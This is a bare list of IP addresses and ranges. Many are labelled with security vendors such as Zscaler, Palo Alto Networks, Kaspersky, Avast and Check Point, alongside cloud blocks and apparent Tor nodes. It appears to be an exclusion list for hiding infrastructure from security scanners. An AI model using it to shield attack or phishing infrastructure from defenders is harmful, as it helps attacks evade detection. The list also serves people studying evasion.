-165.225.78.0/24 # Zscaler -165.225.79.0/24 # -165.225.80.0/23 # Zscaler -165.225.8.0/23 # Zscaler -165.225.8.0/23 # ZSCALER -165.225.82.0/24 # Zscaler -165.225.84.0/23 # Zscaler -165.225.84.0/23 # ZSCALER -165.225.84.0/24 # Zscaler -165.225.85.0/24 # Zscaler -165.225.86.0/23 # Zscaler -165.225.86.0/23 # ZSCALER -165.225.86.0/24 # Zscaler -165.225.87.0/24 # Zscaler -165.225.88.0/23 # Zscaler -165.225.88.0/23 # ZSCALER -165.225.88.0/24 # Zscaler -165.225.89.0/24 # Zscaler -165.225.90.0/23 # -165.225.92.0/23 # Zscaler -165.225.92.0/23 # ZSCALER -165.225.94.0/23 # Zscaler -165.225.94.0/23 # ZSCALER -165.225.95.0/24 # -165.225.96.0/23 # Zscaler -165.225.96.0/23 # ZSCALER -165.225.98.0/24 # Zscaler -165.227.200.152 -165.227.58.177 -165.255.0.0/17 -165.255.186.248 -165.255.224.117 -166.70.15.14 -166.70.207.2 -166.98.138.0/23 # Symantec Corporation -166.98.152.0/23 -166.98.242.0/23 -166.98.242.0/23 # Symantec Corporation -166.98.38.0/24 -166.98.67.0/24 -166.98.71.0/24 -166.98.71.0/24 # Symantec Corporation -167.114.251.167 -167.114.34.150 -168.149.128.0/18 # Symantec Corporation -168.149.240.0/24 # Palo Alto Networks -168.149.241.0/24 # Palo Alto Networks -168.149.242.0/24 # Palo Alto Networks -168.149.243.0/24 # Palo Alto Networks -168.149.244.0/24 # Palo Alto Networks -168.149.245.0/24 # Palo Alto Networks -168.149.246.0/24 # Palo Alto Networks -168.149.247.0/24 # Palo Alto Networks -168.61.0.0/16 -168.62.0.0/16 -168.63.0.0/16 -169.239.183.210 -170.176.240.0/21 # Symantec Corporation -170.250.140.52 -171.25.193.20 -171.25.193.235 -171.25.193.25 -171.25.193.77 -171.25.193.78 -172.102.144.0/24 # Check Point Software Technologies, Inc. -172.102.145.0/24 # Check Point Software Technologies, Inc. -172.102.146.0/24 # -172.102.147.0/24 # -172.102.152.0/24 # Check Point Software Technologies, Inc. -172.102.153.0/24 # Check Point Software Technologies, Inc. -172.102.154.0/24 # Check Point Software Technologies, Inc. -172.102.155.0/24 # Check Point Software Technologies, Inc. -172.102.156.0/24 # Check Point Software Technologies, Inc. -172.102.157.0/24 # Check Point Software Technologies, Inc. -172.102.158.0/24 -172.104.148.28 -172.104.187.79 -172.93.48.163 -172.96.0.0/16 -172.98.193.43 -173.14.173.227 -173.208.153.75 -173.240.208.0/24 # SonicWALL, Inc. -173.240.209.0/24 # SonicWALL, Inc. -173.240.210.0/24 # SonicWALL, Inc. -173.240.211.0/24 # SonicWALL, Inc. -173.240.212.0/24 # SonicWALL, Inc. -173.240.213.0/24 # SonicWALL, Inc. -173.240.214.0/24 # SonicWALL, Inc. -173.240.215.0/24 # SonicWALL, Inc. -173.240.216.0/24 # SonicWALL, Inc. -173.240.220.0/24 # SonicWALL, Inc. -173.240.221.0/24 # SonicWALL, Inc. -173.240.222.0/24 # SonicWALL, Inc. -173.243.128.0/20 -173.243.128.0/20 # Fortinet Inc. -173.243.128.0/21 # Fortinet Inc. -173.243.136.0/21 -173.243.136.0/21 # Fortinet Inc. -173.243.138.0/24 # Fortinet Inc. -173.243.140.0/24 # Fortinet Inc. -173.243.141.0/24 # -173.243.142.0/24 # -173.243.143.0/24 # Fortinet Inc. -173.249.2.79 -173.254.216.66 -173.255.226.142 -173.255.231.125 -173.255.253.173 -173.94.0.0/16 -174.129.0.0/16 -175.41.0.0/16 -176.10.104.240 -176.10.104.243 -176.10.107.180 -176.121.10.52 -176.126.252.11 -176.126.252.12 -176.223.113.26 -176.31.180.157 -176.31.45.3 -176.32.0.0/16 -176.34.0.0/16 -176.36.117.185 -176.38.163.77 -176.58.100.98 -176.58.89.182 -177.133.182.77 -177.157.253.157 -177.39.96.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil -177.39.97.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil -177.39.98.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil -177.39.99.0/24 # Forcepoint Brasil Ger. e Seg. de Internet Ltda.Brazil -177.71.0.0/16 -177.72.0.0/16 -178.17.170.13 -178.17.170.135 -178.17.170.149 -178.17.170.156 -178.17.170.164 -178.17.170.194 -178.17.170.195 -178.17.170.196 -178.17.171.111 -178.17.171.49 -178.17.174.10 -178.17.174.14 -178.17.174.198 -178.175.131.194 -178.18.83.215 -178.202.169.177 -178.20.55.16 -178.20.55.18 -178.209.42.84 -178.236.0.0/16 -178.238.237.44 -178.32.181.97 -178.32.181.98 -178.32.181.99 -180.189.28.0/24 -18.130.0.0/15 -18.132.0.0/13 -18.132.0.0/14 -18.144.0.0/12 -18.160.0.0/11 -18.192.0.0/11 -18.224.0.0/12 -18.240.0.0/13 -18.248.0.0/14 -18.248.1.85 -18.248.2.85 -18.252.0.0/15 -182.75.165.176/30 -184.169.0.0/16 -184.72.0.0/16 -184.73.0.0/16 -184.94.113.0/24 # Canada -184.94.114.0/24 # Canada -185.100.84.108 -185.100.84.82 -185.100.85.101 -185.100.85.112 -185.100.85.147 -185.100.85.190 -185.100.85.191 -185.100.85.192 -185.100.85.61 -185.100.86.100 -185.100.86.141 -185.100.86.154 -185.100.86.167 -185.100.86.199 -185.100.86.217 -185.100.86.69 -185.100.86.86 -185.100.87.206 -185.100.87.207 -185.100.87.82 -185.103.99.60 -185.104.120.2 -185.104.120.3 -185.104.120.4 -185.104.120.7 -185.10.68.119 -185.10.68.139 -185.10.68.191 -185.107.81.233 -185.107.81.234 -185.11.167.4 -185.112.157.135 -185.112.254.195 -185.117.215.9 -185.127.25.68 -185.129.62.62 -185.143.0.0/16 -185.157.232.64 -185.159.128.193 -185.16.200.176 -185.163.1.11 -185.165.168.229 -185.165.168.42 -185.165.168.77 -185.165.169.23 -185.169.235.5 -185.170.42.18 -185.177.59.206 -185.186.77.27 -185.189.14.230 -185.189.14.61 -185.189.92.0/24 # AVG Technologies CZ, s.r.o.Czech Republic -185.189.93.0/24 # AVG Technologies CZ, s.r.o.Czech Republic -185.189.94.0/24 # AVAST Software s.r.o. -185.189.94.0/24 # AVAST Software s.r.o.Czech Republic -185.189.95.0/24 # AVAST Software s.r.o. -185.189.95.0/24 # AVAST Software s.r.o.Czech Republic -185.203.240.111 -185.203.241.120 -185.203.242.105 -185.209.20.165 -185.209.20.209 -185.209.21.47 -185.219.82.241 -185.219.82.242 -185.219.82.243 -185.31.172.234 -185.34.33.2 -185.38.14.171 -185.38.14.215 -185.46.212.0/23 # Zscaler -185.46.212.0/23 # Zscaler Switzerland GmbHSwitzerland -185.46.214.0/23 # Zscaler -185.46.214.0/23 # Zscaler Switzerland GmbHSwitzerland -185.48.0.0/16 -185.51.228.0/24 # AVAST Software s.r.o.Czech Republic -185.51.229.0/24 # AVAST Software s.r.o.Czech Republic -185.51.230.0/24 # AVAST Software s.r.o.Czech Republic -185.51.231.0/24 # AVAST Software s.r.o. -185.51.231.0/24 # AVAST Software s.r.o.Czech Republic -185.54.220.0/24 # Kaspersky Lab KDP -185.54.220.0/24 # Kaspersky Lab KDPRussian Federation -185.54.221.0/24 # Kaspersky Lab KDPRussian Federation -185.54.222.0/24 # Kaspersky Lab KDPRussian Federation -185.58.84.0/22 -185.61.138.207 -185.61.149.193 -185.62.57.91 -185.65.205.10 -185.66.200.10 -185.70.11.132 -185.72.244.24 -185.82.216.233 -185.82.217.51 -185.82.217.70 -185.85.12.0/24 # Kaspersky Lab AORussian Federation -185.85.14.0/24 # Kaspersky Lab AORussian Federation -185.85.15.0/24 # Kaspersky Lab AO -185.85.15.0/24 # Kaspersky Lab AORussian Federation -185.86.149.175 -185.87.111.113 -185.87.185.45 -185.94.156.0/24 # ESET, spol. s r.o. -185.94.156.0/24 # ESET, spol. s r.o.Slovakia -185.94.157.0/24 # ESET, spol. s r.o.Slovakia -185.94.158.0/24 # ESET, spol. s r.o.Slovakia -185.94.159.0/24 # ESET, spol. s r.o. -185.94.159.0/24 # ESET, spol. s r.o.Slovakia -186.120.225.119 -187.20.55.95 -188.116.11.181 -188.143.42.27 -188.166.127.251 -188.214.104.146 -188.235.14.159 -188.235.37.42 -18.85.22.204 -189.207.179.80 -189.84.21.44 -190.10.8.50 -190.210.98.90 -191.232.0.0/16 -191.233.0.0/16 -191.234.0.0/16 -191.235.0.0/16 -191.236.0.0/16 -191.237.0.0/16 -191.238.0.0/16 -191.239.0.0/16 -191.34.129.22 -191.96.249.110 -192.132.210.0/24 # Forcepoint, LLC -192.150.187.46 -192.151.178.0/24 # SurfControl -192.151.179.0/24 # SurfControl -192.151.180.0/24 # SurfControl -192.151.181.0/24 # SurfControl -192.160.102.164 -192.160.102.165 -192.160.102.166 -192.160.102.168 -192.160.102.169 -192.160.102.170 -192.195.80.10 -192.241.79.178 -192.243.113.200 -192.34.80.176 -192.36.27.4 -192.36.27.6 -192.36.27.7 -192.42.115.102 -192.42.116.16 -192.81.131.49 -192.92.94.0/24 # Symantec LimitedIreland -192.94.206.0/24 # ESET LLC -193.107.85.56 -193.107.85.57 -193.110.108.0/23 # F-Secure Oyj -193.110.157.151 -193.149.0.0/16 -193.15.16.4 -193.164.131.95 -193.171.202.150 -193.201.225.45 -193.233.60.154 -193.70.39.41 -193.7.204.0/24 -193.7.207.0/24 -193.90.12.115 -193.90.12.116 -193.90.12.117 -193.90.12.118 -193.90.12.119 -194.104.108.0/24 -194.104.111.0/24 -194.218.3.79 -194.29.32.0/20 # Check Point Software Technologies LTDIsrael -194.29.32.0/24 # Check Point Software Technologies LTD -194.29.32.0/24 # Check Point Software Technologies LTDIsrael -194.54.162.212 -194.88.143.66 -195.130.217.0/24 -195.189.155.0/24 -195.189.155.0/24 # Bitdefender SRL -195.189.155.0/24 # Bitdefender SRLRomania -195.210.4.0/23 # Bitdefender SRL -195.210.4.0/23 # Bitdefender SRLRomania -195.219.163.68 -195.219.166.53 -195.22.126.177 -195.22.126.178 -195.228.45.176 -195.254.135.76 -195.74.76.0/24 # AVAST Software s.r.o. -195.74.76.0/24 # AVAST Software s.r.o.Czech Republic -196.216.238.0/24 # Forcepoint MauritiusSouth Africa -196.41.123.180 -196.52.48.49 -196.54.55.14 -197.231.221.211 -198.100.148.112 -198.167.223.38 -198.211.122.191 -198.245.60.8 -198.35.20.0/24 # Barracuda Networks, Inc. -198.35.21.0/24 # Barracuda Networks, Inc. -198.46.138.18 -198.50.159.155 -198.50.159.204 -198.50.200.129 -198.50.200.131 -198.50.200.134 -198.50.200.135 -198.50.200.147 -198.58.100.240 -198.58.107.53 -198.6.32.0/20 -198.6.32.0/24 -198.6.34.0/24 -198.6.44.0/23 -198.6.48.0/24 -198.6.62.0/24 -198.73.50.71 -198.96.155.3 -199.116.168.0/21 -199.127.226.150 -199.167.52.0/24 -199.167.52.0/24 # Palo Alto Networks -199.167.53.0/24 -199.167.53.0/24 # Palo Alto Networks -199.167.54.0/24 # Palo Alto networks -199.167.54.0/24 # Palo Alto Networks -199.167.55.0/24 -199.168.148.0/24 # Zscaler -199.168.149.0/24 # Zscaler -199.168.150.0/24 # Zscaler -199.168.151.0/24 # Zscaler -199.247.32.0/20 # Symantec Corporation -199.249.223.40 -199.249.223.41 -199.249.223.42 -199.249.223.43 -199.249.223.44 -199.249.223.45 -199.249.223.46 -199.249.223.47 -199.249.223.48 -199.249.223.49 -199.249.223.60 -199.249.223.61 -199.249.223.62 -199.249.223.63 -199.249.223.64 -199.249.223.65 -199.249.223.66 -199.249.223.67 -199.249.223.68 -199.249.223.69 -199.249.223.71 -199.249.223.72 -199.249.223.73 -199.249.223.74 -199.249.223.75 -199.249.223.76 -199.249.223.77 -199.249.223.78 -199.249.223.79 -199.249.223.81 -199.249.224.40 -199.249.224.41 -199.249.224.42 -199.249.224.43 -199.249.224.44 -199.249.224.45 -199.249.224.46 -199.249.224.47 -199.249.224.48 -199.249.224.49 -199.249.224.60 -199.249.224.61 -199.249.224.62 -199.249.224.63 -199.249.224.64 -199.249.224.65 -199.249.224.66 -199.249.224.67 -199.249.224.68 -199.249.224.69 -199.254.238.0/24 -199.30.0.0/16 -199.30.228.0/22 -199.68.196.124 -199.87.154.255 -20.184.0.0/16 -20.185.0.0/16 -20.186.0.0/16 -20.187.0.0/16 -20.188.0.0/16 -20.189.0.0/16 -20.190.0.0/16 -20.191.0.0/16 -202.126.13.0/24 -202.189.133.0/24 -202.3.185.0/24 # Trend Micro Incorporated. -202.3.185.0/24 # Trend Micro Incorporated.Taiwan -20.36.0.0/16 -20.37.0.0/16 -20.38.0.0/16 -203.83.0.0/16 -203.88.136.199 -20.39.0.0/16 -20.40.0.0/16 -20.41.0.0/16 -204.11.50.131 -204.118.31.0/24 # SONICWALL -204.13.200.0/22 -204.141.92.0/24 -204.156.124.0/22 # Barracuda CanadaCanada -204.15.64.0/23 # Forcepoint, LLC -204.15.66.0/24 # Forcepoint, LLC -204.15.67.0/24 # Forcepoint, LLC -204.15.68.0/24 # Forcepoint, LLC -204.15.69.0/24 # Forcepoint, LLC -204.15.71.0/24 # Forcepoint, LLC -204.180.153.0/24 # SonicWall -204.194.29.4 -20.42.0.0/16 -204.212.170.0/24 # SonicWall -204.231.0.0/16 -204.236.0.0/16 -204.246.0.0/16 -20.43.0.0/16 -20.44.0.0/16 -204.8.156.142 -204.85.191.30 -204.85.191.31 -205.139.110.0/23 -205.166.94.153 -205.168.84.133 -205.251.0.0/16 -206.165.76.0/24 -206.47.132.0/24 # Fortinet Technologies (Canada)Canada -206.47.184.0/24 # Fortinet Technologies (Canada)Canada -206.55.74.0 -207.102.138.0/24 -207.154.238.204 -207.171.0.0/16 -207.211.30.0/24 -207.211.31.0/24 -207.244.70.35 -207.46.0.0/16 -207.47.45.0/24 # Nextweb, Inc -207.68.0.0/16 -207.82.80.0/24 -208.127.0.0/17 # Palo Alto Networks -208.127.128.0/18 # Palo Alto Networks -208.127.200.0/24 # Palo Alto Networks -208.127.224.0/21 # Palo Alto Networks -208.127.240.0/21 # Palo Alto Networks -208.184.7.0/24 -208.67.1.79 -208.67.1.83 -208.80.192.0/21 -208.80.192.0/21 # Forcepoint, LLC -208.80.198.0/24 # Forcepoint, LLC -208.84.65.0/24 -208.84.66.0/24 -208.86.202.0/24 -208.86.203.0/24 -208.87.232.0/21 -208.87.232.0/24 -208.87.232.0/24 # SurfControl -208.87.233.0/24 # SurfControl -208.87.234.0/24 # SurfControl -208.87.235.0/24 # SurfControl -208.87.236.0/24 # SurfControl -208.87.237.0/24 # SurfControl -208.87.238.0/24 # SurfControl -208.87.239.0/24 # SurfControl -208.90.236.0/22 -208.91.112.0/22 -208.91.112.0/22 # Fortinet Inc. -208.91.112.0/23 -208.91.112.0/24 # Fortinet Inc. -208.91.113.0/24 # Fortinet Inc. -208.91.114.0/23 -208.91.114.0/23 # Fortinet Inc. -208.91.115.0/24 # -208.94.110.37 -209.123.234.23 -209.194.169.0/24 # -209.222.81.0/24 # -209.222.82.0/24 # Barracuda Networks, Inc. -209.222.83.0/24 # Barracuda Networks, Inc. -209.222.87.0/24 # Barracuda Networks, Inc. -209.240.0.0/16 -209.87.208.0/24 # Check Point Software Technologies, Inc. -209.87.209.0/24 # Check Point Software Technologies, Inc. -209.87.210.0/24 # Check Point Software Technologies, Inc. -209.87.211.0/24 # Check Point Software Technologies, Inc. -209.87.212.0/24 # Check Point Software Technologies, Inc. -209.87.214.0/24 # Check Point Software Technologies, Inc. -209.87.215.0/24 # Check Point Software Technologies, Inc. -209.87.216.0/22 # Check Point Software Technologies, Inc. -209.87.220.0/24 # Check Point Software Technologies, Inc. -209.87.221.0/24 # Check Point Software Technologies, Inc. -209.87.222.0/24 # Check Point Software Technologies, Inc. -209.97.112.0/20 # Check Point Software Technologies, Inc. -210.3.102.152 -210.50.9.88 -211.21.48.217 -212.16.104.33 -212.19.17.213 -212.21.66.6 -212.47.229.60 -212.47.239.73 -212.47.243.140 -212.47.246.21 -212.81.199.159 -212.83.40.239 -212.92.219.15 -213.108.105.71 -213.108.105.92 -213.152.228.0/24 # zScaler -213.152.228.0/24 # Zscaler -213.199.0.0/16 -213.61.149.100 -213.95.21.54 -216.10.192.0/20 -216.10.193.0/24 -216.104.16.0/20 # TREND MICRO INCORPORATED -216.104.16.0/24 # TREND MICRO INCORPORATED -216.137.0.0/16 -216.145.219.0/24 -216.145.221.0/24 -216.182.0.0/16 -216.205.24.0/24 -216.218.134.12 -216.218.222.11 -216.218.222.12 -216.228.144.0/24 # Check Point Software Technologies, Inc. -216.228.145.0/24 # Check Point Software Technologies, Inc. -216.228.146.0/24 # Check Point Software Technologies, Inc. -216.228.147.0/24 # Check Point Software Technologies, Inc. -216.228.148.0/24 # Check Point Software Technologies, Inc. -216.228.149.0/24 # Check Point Software Technologies, Inc. -216.228.150.0/24 # Check Point Software Technologies, Inc. -216.228.151.0/24 # Check Point Software Technologies, Inc. -216.228.152.0/24 # Check Point Software Technologies, Inc. -216.228.153.0/24 # Check Point Software Technologies, Inc. -216.228.154.0/24 # Check Point Software Technologies, Inc. -216.228.155.0/24 # Check Point Software Technologies, Inc. -216.228.156.0/24 # Check Point Software Technologies, Inc. -216.228.157.0/24 # Check Point Software Technologies, Inc. -216.228.158.0/24 # Check Point Software Technologies, Inc. -216.228.159.0/24 # Check Point Software Technologies, Inc. -216.239.90.19 -216.35.243.0/24 -216.35.244.0/24 -216.82.240.0/22 -216.82.246.0/24 -216.82.248.0/22 -216.82.252.0/22 -216.82.253.0/22 -216.82.254.0/22 -216.99.128.0/20 # TREND MICRO INCORPORATED -217.115.10.131 -217.170.197.83 -217.182.207.27 -217.182.74.253 -217.182.76.240 -217.182.78.177 -217.197.81.19 -220.227.48.213 -222.110.3.1 -223.26.48.248 -2.238.18.141 -23.100.0.0/16 -23.101.0.0/16 -23.102.0.0/16 -23.103.0.0/16 -23.129.64.11 -23.129.64.12 -23.129.64.13 -23.129.64.14 -23.129.64.15 -23.20.0.0/16 -23.239.28.127 -23.249.49.0/24 -23.249.50.0/24 -23.249.51.0/24 -23.249.52.0/24 -23.249.53.0/24 -23.249.54.0/24 -23.249.55.0/24 -23.83.238.245 -23.92.27.23 -23.92.28.23 -23.96.0.0/16 -23.97.0.0/16 -23.98.0.0/16 -23.99.0.0/16 -24.207.212.154 -24.27.178.106 -27.0.0.0/16 -3.0.0.0/16 -3.112.0.0/16 -31.179.151.198 -31.185.104.19 -31.185.104.20 -31.185.104.21 -31.185.27.208 -3.120.0.0/16 -31.220.111.120 -3.16.0.0/16 -3.40.0.0/16 -35.153.0.0/16 -35.154.0.0/15 -35.156.0.0/14 -35.160.0.0/12 -35.176.0.0/14 -35.180.0.0/15 -35.182.0.0/16 -35.184.106.64 -35.193.100.176 -36.227.161.175 -37.139.8.104 -37.156.184.0/23 # AVAST Software s.r.o. -37.156.184.0/23 # AVAST Software s.r.o.Czech Republic -37.156.184.0/24 # Czech Republic -37.156.185.0/24 # Czech Republic -37.156.187.0/24 # Czech Republic -37.187.129.166 -37.187.53.94 -37.187.7.74 -37.218.240.21 -37.218.240.50 -37.218.240.68 -37.218.240.80 -37.220.35.202 -37.220.36.240 -37.48.120.196 -37.59.101.176 -37.59.112.7 -37.59.116.170 -37.59.119.196 -37.97.228.159 -3.80.0.0/16 -3.8.0.0/16 -3.82.0.0/16 -3.89.0.0/16 -40.112.0.0/16 -40.113.0.0/16 -40.114.0.0/16 -40.115.0.0/16 -40.116.0.0/16 -40.117.0.0/16 -40.118.0.0/16 -40.119.0.0/16 -40.121.0.0/16 -40.122.0.0/16 -40.123.0.0/16 -40.124.0.0/16 -40.125.0.0/16 -40.126.0.0/16 -40.127.0.0/16 -40.64.0.0/16 -40.65.0.0/16 -40.66.0.0/16 -40.67.0.0/16 -40.68.0.0/16 -40.69.0.0/16 -40.70.0.0/16 -40.71.0.0/16 -40.74.0.0/16 -40.75.0.0/16 -40.76.0.0/16 -40.77.0.0/16 -40.78.0.0/16 -40.79.0.0/16 -40.80.0.0/16 -40.81.0.0/16 -40.82.0.0/16 -40.83.0.0/16 -40.84.0.0/16 -40.85.0.0/16 -40.86.0.0/16 -40.87.0.0/16 -40.88.0.0/16 -40.89.0.0/16 -40.90.0.0/16 -40.91.0.0/16 -41.100.127.24 -41.100.95.92 -41.103.213.190 -41.206.188.206 -41.74.192.0/21 -41.74.200.0/23 -41.74.202.0/24 -41.74.203.0/24 -41.74.204.0/22 -41.78.128.113 -45.33.23.23 -45.33.48.204 -45.35.72.85 -45.62.236.66 -45.62.251.245 -45.76.115.159 -45.79.137.11 -45.79.144.222 -45.79.198.115 -45.79.208.219 -45.79.73.22 -45.79.85.112 -46.101.127.145 -46.101.139.248 -46.101.150.49 -46.101.164.37 -46.137.0.0/16 -46.165.230.5 -46.165.254.166 -46.17.97.112 -46.182.106.190 -46.182.18.214 -46.182.18.40 -46.182.18.46 -46.182.19.15 -46.182.19.219 -46.183.218.199 -46.194.136.3 -46.194.23.204 -46.226.108.26 -46.228.128.0/23 # F-Secure OYj -46.228.128.0/23 # F-Secure OYjFinland -46.228.129.0/24 # F-Secure OYjFinland -46.228.130.0/23 # F-Secure OYjFinland -46.228.132.0/23 # F-Secure OYjFinland -46.228.134.0/23 # F-Secure OYjFinland -46.228.136.0/23 # F-Secure OYjFinland -46.228.140.0/23 # F-Secure OYjFinland -46.228.143.0/24 # F-Secure OyjFinland -46.233.0.70 -46.235.227.70 -46.246.35.71 -46.246.35.72 -46.246.35.81 -46.246.49.100 -46.246.49.106 -46.246.49.186 -46.29.248.238 -46.4.55.177 -46.4.77.210 -46.4.81.178 -46.51.0.0/16 -46.72.103.95 -46.72.118.182 -46.72.66.220 -46.72.77.67 -46.98.198.16 -46.98.198.232 -46.98.199.228 -46.98.199.45 -46.98.200.204 -46.98.201.202 -46.98.205.117 -46.98.205.60 -46.98.206.9 -46.98.207.186 -49.50.108.240 -50.112.0.0/16 -50.16.0.0/16 -50.18.0.0/16 -50.19.0.0/16 -50.237.243.0/24 # -50.247.195.124 -50.76.159.218 -51.104.0.0/16 -51.105.0.0/16 -51.136.0.0/16 -51.137.0.0/16 -51.140.0.0/16 -51.141.0.0/16 -51.142.0.0/16 -51.143.0.0/16 -51.144.0.0/16 -51.145.0.0/16 -51.15.134.120 -51.15.141.220 -51.15.196.158 -51.15.199.104 -51.15.212.104 -51.15.217.56 -51.15.34.210 -51.15.34.214 -51.15.40.233 -51.15.43.205 -51.15.43.232 -51.15.44.197 -51.15.45.97 -51.15.46.115 -51.15.46.49 -51.15.50.133 -51.15.53.118 -51.15.53.83 -51.15.54.136 -51.15.56.11 -51.15.57.177 -51.15.57.79 -51.15.60.255 -51.15.60.62 -51.15.62.146 -51.15.63.229 -51.15.63.98 -51.15.64.212 -51.15.70.13 -51.15.70.226 -51.15.70.228 -51.15.71.118 -51.15.72.53 -51.15.73.182 -51.15.76.81 -51.15.79.107 -51.15.8.100 -51.15.84.183 -51.15.87.157 -51.163.158.0/23 -51.255.202.66 -5.164.205.245 -5.165.66.7 -5.165.79.216 -5.188.11.165 -5.189.146.133 -5.189.188.111 -5.196.0.149 -5.196.1.129 -5.196.121.161 -5.196.29.217 -5.196.66.162 -5.199.130.188 -5.254.112.154 -5.254.79.66 -5.39.217.14 -54.36.81.57 -5.45.56.0/24 # AVAST Software s.r.o.Czech Republic -5.45.57.0/24 # AVAST Software s.r.o.Czech Republic -5.45.58.0/24 # AVAST Software s.r.o.Czech Republic -5.45.59.0/24 # AVAST Software s.r.o.Czech Republic -5.45.62.0/24 # AVAST Software s.r.o.Czech Republic -5.45.63.0/24 # AVAST Software s.r.o. -5.45.63.0/24 # AVAST Software s.r.o.Czech Republic -5.56.214.118 -5.62.17.0/24 # AVAST cloud -5.62.21.0/24 # AVAST Software s.r.o. -5.62.30.0/24 # AVAST Software s.r.o. -5.62.32.0/24 # Avast Software -5.62.33.0/24 # AVAST Software s.r.o. -5.62.34.0/24 # AVAST Software s.r.o. -5.62.35.0/24 # AVAST Software s.r.o. -5.62.36.0/23 # AVAST Software s.r.o. -5.62.38.0/24 # AVAST Software s.r.o. -5.62.39.0/24 # AVAST Software s.r.o. -5.62.42.0/23 # AVAST Software s.r.o. -5.62.44.0/23 # AVAST Software s.r.o. -5.62.46.0/23 # AVAST Software s.r.o. -5.62.46.0/24 # AVAST Software s.r.o. -5.62.47.0/24 # AVAST Software s.r.o. -5.62.48.0/23 # AVAST Software s.r.o. -5.62.50.0/24 # -5.62.52.0/24 # AVAST Software s.r.o. -5.62.53.0/24 # AVAST Software s.r.o. -5.62.54.0/24 # -5.62.55.0/24 # AVAST Software s.r.o. -5.62.56.0/23 # AVAST Software s.r.o. -5.62.56.0/24 # AVAST Software s.r.o. -5.62.57.0/24 # AVAST Software s.r.o. -5.62.58.0/23 # AVAST Software s.r.o. -5.62.60.0/23 # AVAST Software s.r.o. -5.62.62.0/23 # AVAST Software s.r.o. -59.127.163.155 -5.9.195.140 -60.248.162.179 -61.228.92.249 -62.102.148.67 -62.12.115.107 -62.133.130.105 -62.140.10.0/24 -62.140.7.0/24 -62.141.39.47 -62.149.12.153 -62.176.4.10 -62.198.32.223 -62.210.105.116 -62.210.105.86 -62.210.129.246 -62.210.37.82 -62.212.73.141 -62.219.3.47 -62.219.3.48 -62.235.222.192 -63.128.21.0/24 -63.137.229.0/24 # Fortinet Inc -63.245.192.0/23 -63.245.204.0/24 -63.245.205.0/24 -63.245.206.0/24 -63.251.166.0/24 # Watchguard Technologies Inc -63.32.0.0/16 -64.113.32.29 -64.124.32.84 -64.137.162.142 -64.137.205.124 -64.137.210.30 -64.215.22.0/24 # Zscaler -64.215.22.0/24 # ZSCALER -64.235.144.0/24 -64.235.148.0/23 # Barracuda Networks, Inc. -64.235.150.0/24 # Barracuda Networks, Inc. -64.235.151.0/24 # Barracuda Networks, Inc. -64.235.153.0/24 # Barracuda Networks, Inc. -64.235.155.0/24 # -64.235.158.0/24 # Barracuda Networks, Inc. -64.252.0.0/16 -64.27.17.140 -64.4.0.0/16 -64.64.96.0/24 # Avast -64.70.67.0/24 # Symantec Corporation -64.70.94.0/24 # Symantec Corporation -64.74.215.0/24 -64.94.121.0/24 -65.129.144.43 -65.154.226.0/24 -65.154.226.0/24 # PALO ALTO NETWORKS -65.155.38.0/24 # PALO ALTO NETWORKS -65.181.123.254 -65.19.167.130 -65.19.167.131 -65.19.167.132 -65.197.254.0/24 -65.201.134.0/24 -65.52.0.0/16 -65.54.0.0/16 -65.55.0.0/16 -66.110.216.10 -66.155.4.213 -66.159.192.0/19 # Palo Alto Networks -66.180.193.219 -66.180.80.0/20 # TREND MICRO INCORPORATED -66.220.3.179 -66.232.32.0/24 # Palo Alto Networks -66.232.33.0/24 # Palo Alto Networks -66.232.34.0/24 # Palo Alto Networks -66.232.35.0/24 # Palo Alto Networks -66.232.36.0/24 # Palo Alto Networks -66.232.37.0/24 # Palo Alto Networks -66.232.38.0/24 # Palo Alto Networks -66.232.39.0/24 # Palo Alto Networks -66.232.40.0/24 # Palo Alto Networks -66.232.41.0/24 # Palo Alto Networks -66.232.42.0/24 # Palo Alto Networks -66.232.43.0/24 # Palo Alto Networks -66.232.44.0/24 # Palo Alto Networks -66.232.45.0/24 # Palo Alto Networks -66.232.46.0/24 # Palo Alto Networks -66.232.47.0/24 # Palo Alto Networks -66.35.16.0/20 # Fortinet Inc. -66.35.16.0/24 # Fortinet Inc. -66.35.19.0/24 # Fortinet Inc. -66.93.208.240/28 -67.115.118.0/24 # SonicWallsInc -67.202.0.0/16 -67.205.146.164 -67.215.255.140 -67.219.240.0/23 -67.219.242.0/23 -67.219.244.0/23 -67.219.246.0/23 -67.219.248.0/23 -67.219.250.0/23 -67.219.252.0/23 -67.231.144.0/24 -67.231.145.0/24 -67.231.146.0/24 -67.231.147.0/24 -67.231.148.0/24 -67.231.149.0/24 -67.231.151.0/24 -67.231.158.0/24 -69.162.107.5 -69.164.207.234 -69.94.64.0/24 # Czech Republic -69.94.66.0/24 # AVAST Software s.r.o.Czech Republic -69.94.67.0/24 # AVAST Software s.r.o.Czech Republic -69.94.68.0/24 # AVAST Software s.r.o.Czech Republic -69.94.69.0/24 # AVAST Software s.r.o.Czech Republic -69.94.70.0/24 # AVAST Software s.r.o.Czech Republic -69.94.72.0/23 # AVAST Software s.r.o.Czech Republic -69.94.74.0/23 # AVAST Software s.r.o.Czech Republic -69.94.74.0/24 # AVAST Software s.r.o.Czech Republic -69.94.75.0/24 # AVAST Software s.r.o.Czech Republic -69.94.76.0/24 # AVAST Software s.r.o.Czech Republic -69.94.77.0/24 # AVAST Software s.r.o.Czech Republic -69.94.78.0/24 # AVAST Software s.r.o.Czech Republic -69.94.79.0/24 # AVAST Software s.r.o.Czech Republic -70.132.0.0/16 -70.37.0.0/16 -70.39.159.0/24 # Zscaler -70.39.159.0/24 # ZSCALER -70.42.131.0/24 -71.152.0.0/16 -71.46.220.68 -72.12.207.14 -72.14.179.10 -72.14.182.209 -72.165.69.0/24 # Palo Alto Networks -72.165.69.0/24 # PALO ALTO NETWORKS -72.204.193.71 -72.21.0.0/16 -72.210.252.137 -72.221.196.141 -72.44.0.0/16 -72.5.231.0/24 -72.52.75.27 -72.5.65.0/24 -72.93.243.211 -74.142.74.156 -74.201.127.0/24 -74.217.90.0/24 -74.221.128.0/24 # Palo Alto Networks -74.221.129.0/24 # Palo Alto Networks -74.221.130.0/24 # Palo Alto Networks -74.221.131.0/24 # Palo Alto Networks -74.221.133.0/24 # Palo Alto Networks -74.221.137.0/24 # Palo Alto Networks -74.221.141.0/24 # Palo Alto Networks -74.252.14.154 -74.50.54.69 -75.101.0.0/16 